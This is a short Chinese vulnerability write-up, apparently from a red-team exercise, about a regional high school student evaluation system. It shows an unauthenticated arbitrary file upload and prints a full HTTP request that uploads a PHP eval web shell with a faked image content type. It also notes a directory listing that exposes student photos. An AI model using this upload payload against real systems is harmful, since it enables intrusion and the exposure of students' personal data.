高中学生综合素质评价系统脆弱性
系统 综合 评价 脆弱性 素质
2023-06-13 09:13:34 时间
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
0x00 前言
描述:在护网行动中遇到的一些教育行业系统漏洞总结;该系统大多在学校内网里面基本不向外界所以一般对于其很少爆出漏洞;
0x01 漏洞详细
(1) 任意文件上传
描述:在登录xxx市高中学生综合素质评价系统之后在个人资料处有一个上传头像,测试发现存在任意上传并成功利用取得shell;
通过对代码的分析发现并没有验证任何权限 /Website/MultiuploadFiles.php
(采用zend加密但是可以解密)
WeiyiGeek.
直接未登录访问:http://xxoo:8080/MultiuploadFiles.php / uploadimg.php
,然后上传一个图片用burp截包代码验证了 Content-Type
#POST请求
POST /MultiuploadFiles.php?action=act HTTP/1.1
Host: *.*.*.*:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://*.*.*.*:8080/MultiuploadFiles.php
Cookie: PHPSESSID=q7f4cjpdtpg97e9mn9diqi4p05
X-Forward-For: 127.0.0.1'
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------64873175618108
Content-Length: 818
-----------------------------64873175618108
Content-Disposition: form-data; name="afile"; filename="test.php"
Content-Type: image/jpeg
<?php echo(2333334-1);eval($_POST[0]);?>
-----------------------------64873175618108
Content-Disposition: form-data; name="button"
æ交
-----------------------------64873175618108--
目录遍历
描述: 目录遍历导致的照片泄漏的问题 http://xxoo.com/upload/
;
WeiyiGeek.
数据库下载
相关文章
- 制造型企业的数字化转型离不开 MES 系统
- Ubuntu连接手机_手机连接linux系统
- mac系统安装pycharm_mac下载python3
- 视频行为智能分析系统
- 重庆师范大学c语言考试系统题库,2018年重庆师范大学计算机与信息科学学院820计算机基础综合[专业硕士]之C程序设计考研核心题库…
- IDS入侵检测系统的缺点_IDS入侵检测是指依照
- 图表示学习技术在药物推荐系统中的应用
- ubuntu 20.04系统搭建LNMP环境的方法
- 名掌握Linux系统上的域名查询技巧(linux查看域)
- Linux系统移植实战指南(linux系统移植)
- “综合视觉增强系统”是何种黑科技?
- 科学家重申气候紧急情况的警告:大流行对扭转地球自然系统的轨迹没什么作用
- 优化Linux优化:提高系统性能的利器(linux系统任务)
- Linux系统下SVN的安装和配置(linux安装svn)
- 解决Linux系统Grub引导删除难题(删除linuxgrub)
- Linux之旅:探索分支系统的世界(linux的分支)
- bolin深入探索Linux系统下的符号解析(linuxsum)
- 「我的日记」重现:使用MSSQL版打造更安全、更高效的日记记录系统(日记mssql版)
- 如何在Linux系统中安装QT软件?简明指南分享(qtlinux安装)
- 命令Linux下man命令:用于查看系统手册的神奇工具(linux下 man)
- 星外系统关于权限的综合说明